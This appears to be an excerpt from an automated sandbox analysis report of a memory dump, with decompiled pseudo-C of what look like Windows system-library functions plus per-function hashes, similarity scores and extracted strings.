                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                          • Opcode ID: 77a0f275fc61e98a8b37cb905e65bf473017a22536e81883b4a6053a84205d1d
                                                                                                                          • Instruction ID: 86cba4fab4fa4f2eca10c384e0653208618fd9b815786c4e53106a7c4b56f90e
                                                                                                                          • Opcode Fuzzy Hash: 77a0f275fc61e98a8b37cb905e65bf473017a22536e81883b4a6053a84205d1d
                                                                                                                          • Instruction Fuzzy Hash: A0515DB5E00A189FDB24DFA8C950AAEB7F8BF88740F14406DE549EB292D671ED40CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 76%
                                                                                                                          			E009EB944(signed int* __ecx, char __edx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				char _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				char _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				signed int* _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				intOrPtr _v64;
                                                                                                                          				intOrPtr _v68;
                                                                                                                          				intOrPtr _v72;
                                                                                                                          				intOrPtr _v76;
                                                                                                                          				char _v77;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr* _t65;
                                                                                                                          				intOrPtr _t67;
                                                                                                                          				intOrPtr _t68;
                                                                                                                          				char* _t73;
                                                                                                                          				intOrPtr _t77;
                                                                                                                          				intOrPtr _t78;
                                                                                                                          				signed int _t82;
                                                                                                                          				intOrPtr _t83;
                                                                                                                          				void* _t87;
                                                                                                                          				char _t88;
                                                                                                                          				intOrPtr* _t89;
                                                                                                                          				intOrPtr _t91;
                                                                                                                          				void* _t97;
                                                                                                                          				intOrPtr _t100;
                                                                                                                          				void* _t102;
                                                                                                                          				void* _t107;
                                                                                                                          				signed int _t108;
                                                                                                                          				intOrPtr* _t112;
                                                                                                                          				void* _t113;
                                                                                                                          				intOrPtr* _t114;
                                                                                                                          				intOrPtr _t115;
                                                                                                                          				intOrPtr _t116;
                                                                                                                          				intOrPtr _t117;
                                                                                                                          				signed int _t118;
                                                                                                                          				void* _t130;
                                                                                                                          
                                                                                                                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                                                          				_v8 =  *0xabd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                                                          				_t112 = __ecx;
                                                                                                                          				_v77 = __edx;
                                                                                                                          				_v48 = __ecx;
                                                                                                                          				_v28 = 0;
                                                                                                                          				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                                                          				_t105 =  *_t5;
                                                                                                                          				_v20 = 0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				if(_t105 == 0) {
                                                                                                                          					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                                                          					_t60 =  *__ecx |  *_t50;
                                                                                                                          					if(( *__ecx |  *_t50) != 0) {
                                                                                                                          						 *__ecx = 0;
                                                                                                                          						__ecx[1] = 0;
                                                                                                                          						if(E009E7D50() != 0) {
                                                                                                                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                          						} else {
                                                                                                                          							_t65 = 0x7ffe0386;
                                                                                                                          						}
                                                                                                                          						if( *_t65 != 0) {
                                                                                                                          							E00A98CD6(_t112);
                                                                                                                          						}
                                                                                                                          						_push(0);
                                                                                                                          						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                                                          						_push( *_t52);
                                                                                                                          						_t60 = E00A09E20();
                                                                                                                          					}
                                                                                                                          					L20:
                                                                                                                          					_pop(_t107);
                                                                                                                          					_pop(_t113);
                                                                                                                          					_pop(_t87);
                                                                                                                          					return E00A0B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                                                          				}
                                                                                                                          				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                                                          				_t67 =  *_t8;
                                                                                                                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                                                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                                                          				_t108 =  *(_t67 + 0x14);
                                                                                                                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                                                          				_t105 = 0x2710;
                                                                                                                          				asm("sbb eax, edi");
                                                                                                                          				_v44 = _t88;
                                                                                                                          				_v52 = _t108;
                                                                                                                          				_t60 = E00A0CE00(_t97, _t68, 0x2710, 0);
                                                                                                                          				_v56 = _t60;
                                                                                                                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                                                          					L3:
                                                                                                                          					 *(_t112 + 0x44) = _t60;
                                                                                                                          					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                                                          					 *_t112 = _t88;
                                                                                                                          					 *(_t112 + 4) = _t108;
                                                                                                                          					_v20 = _t60 * 0x2710;
                                                                                                                          					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                                                          					if(_v77 != 0) {
                                                                                                                          						L16:
                                                                                                                          						_v36 = _t88;
                                                                                                                          						_v32 = _t108;
                                                                                                                          						if(E009E7D50() != 0) {
                                                                                                                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                          						} else {
                                                                                                                          							_t73 = 0x7ffe0386;
                                                                                                                          						}
                                                                                                                          						if( *_t73 != 0) {
                                                                                                                          							_t105 = _v40;
                                                                                                                          							E00A98F6A(_t112, _v40, _t88, _t108);
                                                                                                                          						}
                                                                                                                          						_push( &_v28);
                                                                                                                          						_push(0);
                                                                                                                          						_push( &_v36);
                                                                                                                          						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                                                          						_push( *_t48);
                                                                                                                          						_t60 = E00A0AF60();
                                                                                                                          						goto L20;
                                                                                                                          					} else {
                                                                                                                          						_t89 = 0x7ffe03b0;
                                                                                                                          						do {
                                                                                                                          							_t114 = 0x7ffe0010;
                                                                                                                          							do {
                                                                                                                          								_t77 =  *0xab8628; // 0x0
                                                                                                                          								_v68 = _t77;
                                                                                                                          								_t78 =  *0xab862c; // 0x0
                                                                                                                          								_v64 = _t78;
                                                                                                                          								_v72 =  *_t89;
                                                                                                                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                                                          								while(1) {
                                                                                                                          									_t105 =  *0x7ffe000c;
                                                                                                                          									_t100 =  *0x7ffe0008;
                                                                                                                          									if(_t105 ==  *_t114) {
                                                                                                                          										goto L8;
                                                                                                                          									}
                                                                                                                          									asm("pause");
                                                                                                                          								}
                                                                                                                          								L8:
                                                                                                                          								_t89 = 0x7ffe03b0;
                                                                                                                          								_t115 =  *0x7ffe03b0;
                                                                                                                          								_t82 =  *0x7FFE03B4;
                                                                                                                          								_v60 = _t115;
                                                                                                                          								_t114 = 0x7ffe0010;
                                                                                                                          								_v56 = _t82;
                                                                                                                          							} while (_v72 != _t115 || _v76 != _t82);
                                                                                                                          							_t83 =  *0xab8628; // 0x0
                                                                                                                          							_t116 =  *0xab862c; // 0x0
                                                                                                                          							_v76 = _t116;
                                                                                                                          							_t117 = _v68;
                                                                                                                          						} while (_t117 != _t83 || _v64 != _v76);
                                                                                                                          						asm("sbb edx, [esp+0x24]");
                                                                                                                          						_t102 = _t100 - _v60 - _t117;
                                                                                                                          						_t112 = _v48;
                                                                                                                          						_t91 = _v44;
                                                                                                                          						asm("sbb edx, eax");
                                                                                                                          						_t130 = _t105 - _v52;
                                                                                                                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                                                          							_t88 = _t102 - _t91;
                                                                                                                          							asm("sbb edx, edi");
                                                                                                                          							_t108 = _t105;
                                                                                                                          						} else {
                                                                                                                          							_t88 = 0;
                                                                                                                          							_t108 = 0;
                                                                                                                          						}
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					if( *(_t112 + 0x44) == _t60) {
                                                                                                                          						goto L20;
                                                                                                                          					}
                                                                                                                          					goto L3;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x009eba7c
                                                                                                                          0x009eba8e
                                                                                                                          0x009eba90
                                                                                                                          0x009eba92
                                                                                                                          0x009ebb14
                                                                                                                          0x009ebb14
                                                                                                                          0x009ebb16
                                                                                                                          0x009ebb16
                                                                                                                          0x00000000
                                                                                                                          0x009eba7c
                                                                                                                          0x009ebb0a
                                                                                                                          0x009ebb0d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ebb0f

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009EB9A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 885266447-0
                                                                                                                          • Opcode ID: 7e5e363ad738af08df6578297829bac147740878bd2b8791d9508bae377e9fd7
                                                                                                                          • Instruction ID: 6a77a11489a0af7b067f6369926d588135c9cb431415d15c90fb70938a81ef2d
                                                                                                                          • Opcode Fuzzy Hash: 7e5e363ad738af08df6578297829bac147740878bd2b8791d9508bae377e9fd7
                                                                                                                          • Instruction Fuzzy Hash: 81514971608381CFCB21CF6AC580A2BBBE9BB88714F24496EF68597355D734EC44CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E009CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                                                          				signed int _t65;
                                                                                                                          				signed short _t69;
                                                                                                                          				intOrPtr _t70;
                                                                                                                          				signed short _t85;
                                                                                                                          				void* _t86;
                                                                                                                          				signed short _t89;
                                                                                                                          				signed short _t91;
                                                                                                                          				intOrPtr _t92;
                                                                                                                          				intOrPtr _t97;
                                                                                                                          				intOrPtr* _t98;
                                                                                                                          				signed short _t99;
                                                                                                                          				signed short _t101;
                                                                                                                          				void* _t102;
                                                                                                                          				char* _t103;
                                                                                                                          				signed short _t104;
                                                                                                                          				intOrPtr* _t110;
                                                                                                                          				void* _t111;
                                                                                                                          				void* _t114;
                                                                                                                          				intOrPtr* _t115;
                                                                                                                          
                                                                                                                          				_t109 = __esi;
                                                                                                                          				_t108 = __edi;
                                                                                                                          				_t106 = __edx;
                                                                                                                          				_t95 = __ebx;
                                                                                                                          				_push(0x90);
                                                                                                                          				_push(0xa9f7a8);
                                                                                                                          				E00A1D0E8(__ebx, __edi, __esi);
                                                                                                                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                                                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                                                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                                                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                                                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                                                          				if(__edx == 0xffffffff) {
                                                                                                                          					L6:
                                                                                                                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                                                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                                                          					__eflags = _t65 & 0x00000002;
                                                                                                                          					if((_t65 & 0x00000002) != 0) {
                                                                                                                          						L3:
                                                                                                                          						L4:
                                                                                                                          						return E00A1D130(_t95, _t108, _t109);
                                                                                                                          					}
                                                                                                                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                                                          					_t108 = 0;
                                                                                                                          					_t109 = 0;
                                                                                                                          					_t95 = 0;
                                                                                                                          					__eflags = 0;
                                                                                                                          					while(1) {
                                                                                                                          						__eflags = _t95 - 0x200;
                                                                                                                          						if(_t95 >= 0x200) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						E00A0D000(0x80);
                                                                                                                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                                                          						_t108 = _t115;
                                                                                                                          						_t95 = _t95 - 0xffffff80;
                                                                                                                          						_t17 = _t114 - 4;
                                                                                                                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                                                          						__eflags =  *_t17;
                                                                                                                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                                          						_t102 = _t110 + 1;
                                                                                                                          						do {
                                                                                                                          							_t85 =  *_t110;
                                                                                                                          							_t110 = _t110 + 1;
                                                                                                                          							__eflags = _t85;
                                                                                                                          						} while (_t85 != 0);
                                                                                                                          						_t111 = _t110 - _t102;
                                                                                                                          						_t21 = _t95 - 1; // -129
                                                                                                                          						_t86 = _t21;
                                                                                                                          						__eflags = _t111 - _t86;
                                                                                                                          						if(_t111 > _t86) {
                                                                                                                          							_t111 = _t86;
                                                                                                                          						}
                                                                                                                          						E00A0F3E0(_t108, _t106, _t111);
                                                                                                                          						_t115 = _t115 + 0xc;
                                                                                                                          						_t103 = _t111 + _t108;
                                                                                                                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                                                          						_t89 = _t95 - _t111;
                                                                                                                          						__eflags = _t89;
                                                                                                                          						_push(0);
                                                                                                                          						if(_t89 == 0) {
                                                                                                                          							L15:
                                                                                                                          							_t109 = 0xc000000d;
                                                                                                                          							goto L16;
                                                                                                                          						} else {
                                                                                                                          							__eflags = _t89 - 0x7fffffff;
                                                                                                                          							if(_t89 <= 0x7fffffff) {
                                                                                                                          								L16:
                                                                                                                          								 *(_t114 - 0x94) = _t109;
                                                                                                                          								__eflags = _t109;
                                                                                                                          								if(_t109 < 0) {
                                                                                                                          									__eflags = _t89;
                                                                                                                          									if(_t89 != 0) {
                                                                                                                          										 *_t103 = 0;
                                                                                                                          									}
                                                                                                                          									L26:
                                                                                                                          									 *(_t114 - 0xa0) = _t109;
                                                                                                                          									 *(_t114 - 4) = 0xfffffffe;
                                                                                                                          									__eflags = _t109;
                                                                                                                          									if(_t109 >= 0) {
                                                                                                                          										L31:
                                                                                                                          										_t98 = _t108;
                                                                                                                          										_t39 = _t98 + 1; // 0x1
                                                                                                                          										_t106 = _t39;
                                                                                                                          										do {
                                                                                                                          											_t69 =  *_t98;
                                                                                                                          											_t98 = _t98 + 1;
                                                                                                                          											__eflags = _t69;
                                                                                                                          										} while (_t69 != 0);
                                                                                                                          										_t99 = _t98 - _t106;
                                                                                                                          										__eflags = _t99;
                                                                                                                          										L34:
                                                                                                                          										_t70 =  *[fs:0x30];
                                                                                                                          										__eflags =  *((char*)(_t70 + 2));
                                                                                                                          										if( *((char*)(_t70 + 2)) != 0) {
                                                                                                                          											L40:
                                                                                                                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                                                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                                                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                                                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                                                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                                                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                                                          											 *(_t114 - 4) = 1;
                                                                                                                          											_push(_t114 - 0x74);
                                                                                                                          											L00A1DEF0(_t99, _t106);
                                                                                                                          											 *(_t114 - 4) = 0xfffffffe;
                                                                                                                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                                          											goto L3;
                                                                                                                          										}
                                                                                                                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                                                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                                                          											goto L40;
                                                                                                                          										}
                                                                                                                          										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                                                          										_push(_t99 & 0x0000ffff);
                                                                                                                          										_push(_t108);
                                                                                                                          										_push(1);
                                                                                                                          										_t101 = E00A0B280();
                                                                                                                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                                                          										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                                                          											__eflags = _t101 - 0x80000003;
                                                                                                                          											if(_t101 == 0x80000003) {
                                                                                                                          												E00A0B7E0(1);
                                                                                                                          												_t101 = 0;
                                                                                                                          												__eflags = 0;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                                          										goto L4;
                                                                                                                          									}
                                                                                                                          									__eflags = _t109 - 0x80000005;
                                                                                                                          									if(_t109 == 0x80000005) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								 *(_t114 - 0x90) = 0;
                                                                                                                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                                                          								_t91 = E00A0E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                                                          								_t115 = _t115 + 0x10;
                                                                                                                          								_t104 = _t91;
                                                                                                                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                                                          								__eflags = _t104;
                                                                                                                          								if(_t104 < 0) {
                                                                                                                          									L21:
                                                                                                                          									_t109 = 0x80000005;
                                                                                                                          									 *(_t114 - 0x90) = 0x80000005;
                                                                                                                          									L22:
                                                                                                                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                                                          									L23:
                                                                                                                          									 *(_t114 - 0x94) = _t109;
                                                                                                                          									goto L26;
                                                                                                                          								}
                                                                                                                          								__eflags = _t104 - _t92;
                                                                                                                          								if(__eflags > 0) {
                                                                                                                          									goto L21;
                                                                                                                          								}
                                                                                                                          								if(__eflags == 0) {
                                                                                                                          									goto L22;
                                                                                                                          								}
                                                                                                                          								goto L23;
                                                                                                                          							}
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					__eflags = _t109;
                                                                                                                          					if(_t109 >= 0) {
                                                                                                                          						goto L31;
                                                                                                                          					}
                                                                                                                          					__eflags = _t109 - 0x80000005;
                                                                                                                          					if(_t109 != 0x80000005) {
                                                                                                                          						goto L31;
                                                                                                                          					}
                                                                                                                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                                                          					_t38 = _t95 - 1; // -129
                                                                                                                          					_t99 = _t38;
                                                                                                                          					goto L34;
                                                                                                                          				}
                                                                                                                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                          					__eflags = __edx - 0x65;
                                                                                                                          					if(__edx != 0x65) {
                                                                                                                          						goto L2;
                                                                                                                          					}
                                                                                                                          					goto L6;
                                                                                                                          				}
                                                                                                                          				L2:
                                                                                                                          				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                                          				_push(_t106);
                                                                                                                          				if(E00A0A890() != 0) {
                                                                                                                          					goto L6;
                                                                                                                          				}
                                                                                                                          				goto L3;
                                                                                                                          			}























                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: _vswprintf_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 677850445-0
                                                                                                                          • Opcode ID: 9c395bdc31ec6266f33bac1e2197b33e3b2ac5c2bbf8abee2ae71c1ff3b5d3d7
                                                                                                                          • Instruction ID: 1977091d00db5d10b7365fa9a218e5b829ca6a80a03cc50a43299b282a9ac4b1
                                                                                                                          • Opcode Fuzzy Hash: 9c395bdc31ec6266f33bac1e2197b33e3b2ac5c2bbf8abee2ae71c1ff3b5d3d7
                                                                                                                          • Instruction Fuzzy Hash: 7951EE71D102698EEF35CF68D945BBEBBB0BF08710F2041BDE859AB282D7744D818B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PATH
                                                                                                                          • API String ID: 0-1036084923
                                                                                                                          • Opcode ID: 561a49377db39a5fb4b28b97c7264ab7aa4f856beba1c2627d83f931051826c4
                                                                                                                          • Instruction ID: c862a2261ac3083c2b5d84e8b0c20649577e102cfe44fe377a09ef7432556825
                                                                                                                          • Opcode Fuzzy Hash: 561a49377db39a5fb4b28b97c7264ab7aa4f856beba1c2627d83f931051826c4
                                                                                                                          • Instruction Fuzzy Hash: 96C18F71E00219DBCB25DFA9D881BBEB7B5FF48710F144429F501AB2A1D778AD41CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: RTL: Re-Waiting
                                                                                                                          • API String ID: 0-316354757
                                                                                                                          • Opcode ID: aaa639217e1e7f189c015b10065b622c4fd515d0c0b7a043458f687081f3408f
                                                                                                                          • Instruction ID: 7d89342a88d3809c9afcfc87a3ef28ca246565e314d9b7d0b6e5dd959d2f1452
                                                                                                                          • Opcode Fuzzy Hash: aaa639217e1e7f189c015b10065b622c4fd515d0c0b7a043458f687081f3408f
                                                                                                                          • Instruction Fuzzy Hash: 94612531E04684AFDB32DF68C840BBEB7A5EF44750F240679E816A72D2C7389D818792
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-2679148245
                                                                                                                          • Opcode ID: a93e4db5a74891054b7227bfb19dd7f6939dc09497f300f896cbdced3c0cee8b
                                                                                                                          • Instruction ID: a2c914f25fb1cb42b6e012451ad62965fc716b52e07fc122c5eb40c8e99fd097
                                                                                                                          • Opcode Fuzzy Hash: a93e4db5a74891054b7227bfb19dd7f6939dc09497f300f896cbdced3c0cee8b
                                                                                                                          • Instruction Fuzzy Hash: 8151AC713043429FDB25DF29D981F1BB7E9EBC4344F140A2CF98687291D631E945CB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                          • Instruction ID: 4f4e69596a3cfc3ee80ebfb8001aa064889cf3af4c850a27aa4c6518376bc50f
                                                                                                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                          • Instruction Fuzzy Hash: 7E51BF716047149FC321DF19C841A6BB7F8FF88750F00892DFA9587691E7B4E904CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: BinaryHash
                                                                                                                          • API String ID: 0-2202222882
                                                                                                                          • Opcode ID: df6aabeccffeb7099b7cd4dde63faec55c90877c066f4155d4d242166dc0c37f
                                                                                                                          • Instruction ID: 05e69c454983669b78a7669503ccd3f786bc47052c82f6684671aeacb46dc38c
                                                                                                                          • Opcode Fuzzy Hash: df6aabeccffeb7099b7cd4dde63faec55c90877c066f4155d4d242166dc0c37f
                                                                                                                          • Instruction Fuzzy Hash: DC4141B6D0052DAADF21DA50DD81FEEB77CAB44714F0145A5BA08AB281DB709F888F94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-2679148245
                                                                                                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                          • Instruction ID: 13a4e6a154dc4257be506bb7f158efbb906cc5c12aeea79540e422056ad9c5fc
                                                                                                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                          • Instruction Fuzzy Hash: E331B0327043456FEB10DF29CD45F9677D9ABC4794F044229BA54DB281E7B0ED14CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: BinaryName
                                                                                                                          • API String ID: 0-215506332
                                                                                                                          • Opcode ID: 5b3146f608cceaea9a8bf891c28bb03572b0652cea4decfd1ebdff1dca914965
                                                                                                                          • Instruction ID: 987bb7b6583c4d2a60795de7fea5364816ef5332b2d1e70a77edecc0d91e9d94
                                                                                                                          • Opcode Fuzzy Hash: 5b3146f608cceaea9a8bf891c28bb03572b0652cea4decfd1ebdff1dca914965
                                                                                                                          • Instruction Fuzzy Hash: 2E31EE3BD0161ABFEF15DB59C955E6BB7B4EB80B20F114169A914A7282D6709F00CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 8fdfc080f4bf0fcf23f013d65dc819859cecc7bd919f02c2b68bee87742aac9d
                                                                                                                          • Instruction ID: 03b918596b9f06e60f71552f364e356a0da7105c4ee9a1c507b1eef962635856
                                                                                                                          • Opcode Fuzzy Hash: 8fdfc080f4bf0fcf23f013d65dc819859cecc7bd919f02c2b68bee87742aac9d
                                                                                                                          • Instruction Fuzzy Hash: 7B31D1B250A3099FC711DF28C981A6BBBE9FBC5758F10092EFA9483251E674DD04CB93
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: WindowsExcludedProcs
                                                                                                                          • API String ID: 0-3583428290
                                                                                                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                          • Instruction ID: a150aac409cdb4d183a9dfdd4c2bacca4b48541b6afb82fb1f534d60797df2d0
                                                                                                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                          • Instruction Fuzzy Hash: 3E210777695228BBCB229BA9D940F5FB7ADEF81B50F158826FD449B300D634DD00D7A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Actx
                                                                                                                          • API String ID: 0-89312691
                                                                                                                          • Opcode ID: 1a7b13d409f80990fd885f1c981b7e93c9db49fdffd0f54987a538f205d7b357
                                                                                                                          • Instruction ID: ca97b285b6b29febd3ae7b65fbf9b5c8fdfd953632fe6741a5e15cf04a1db9e7
                                                                                                                          • Opcode Fuzzy Hash: 1a7b13d409f80990fd885f1c981b7e93c9db49fdffd0f54987a538f205d7b357
                                                                                                                          • Instruction Fuzzy Hash: 48119335304AC28BE7264E1F84B0736729AEB95724F35493BE865CB391D776DC408380
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          • Critical error detected %lx, xrefs: 00A78E21
